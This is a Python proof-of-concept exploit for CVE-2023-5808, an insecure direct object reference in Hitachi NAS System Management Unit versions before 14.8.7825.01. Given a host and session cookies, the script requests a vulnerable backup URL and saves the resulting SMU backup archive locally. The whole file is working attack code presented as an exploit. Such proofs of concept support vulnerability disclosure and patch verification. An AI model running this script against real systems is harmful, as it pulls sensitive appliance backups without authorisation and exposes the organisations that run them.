Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR

1. #!/usr/bin/python3
2. #
3. # Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
4. # CVE:              CVE-2023-5808
5. # Date:             2023-12-13
6. # Exploit Author:   Arslan Masood (@arszilla)
7. # Vendor:           https://www.hitachivantara.com/
8. # Version:          < 14.8.7825.01
9. # Tested On:        13.9.7021.04        
10.  
11. import argparse
12. from datetime import datetime
13. from os import getcwd
14.  
15. import requests
16.  
17. parser = argparse.ArgumentParser(
18.     description="CVE-2023-5808 PoC",
19.     usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
20.     )
21.  
22. # Create --host argument:
23. parser.add_argument(
24.     "--host",
25.     required=True,
26.     type=str,
27.     help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
28.     )
29.  
30. # Create --id argument:
31. parser.add_argument(
32.     "--id",
33.     required=True,
34.     type=str,
35.     help="JSESSIONID cookie value"
36.     )
37.  
38. # Create --sso argument:
39. parser.add_argument(
40.     "--sso",
41.     required=True,
42.     type=str,
43.     help="JSESSIONIDSSO cookie value"
44.     )
45.  
46. args = parser.parse_args()
47.  
48. def download_file(hostname, jsessionid, jsessionidsso):
49.     # Set the filename:
50.     filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"
51.  
52.     # Vulnerable SMU URL:
53.     smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"
54.  
55.     # GET request cookies
56.     smu_cookies = {
57.         "JSESSIONID":       jsessionid,
58.         "JSESSIONIDSSO":    jsessionidsso
59.         }
60.  
61.     # GET request headers:
62.     smu_headers = {
63.         "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
64.         "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
65.         "Accept-Language":              "en-US,en;q=0.5",
66.         "Accept-Encoding":              "gzip, deflate",
67.         "Dnt":                          "1",
68.         "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
69.         "Upgrade-Insecure-Requests":    "1",
70.         "Sec-Fetch-Dest":               "document",
71.         "Sec-Fetch-Mode":               "navigate",
72.         "Sec-Fetch-Site":               "same-origin",
73.         "Sec-Fetch-User":               "?1",
74.         "Te":                           "trailers",
75.         "Connection":                   "close"
76.         }
77.  
78.     # Send the request:
79.     with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
80.         with open(filename, 'wb') as backup_archive:
81.             # Write the zip file to the CWD:
82.             backup_archive.write(file_download.content)
83.  
84.     print(f"{filename} has been downloaded to {getcwd()}")
85.  
86. if __name__ == "__main__":
87.     download_file(args.host, args.id, args.sso)
88.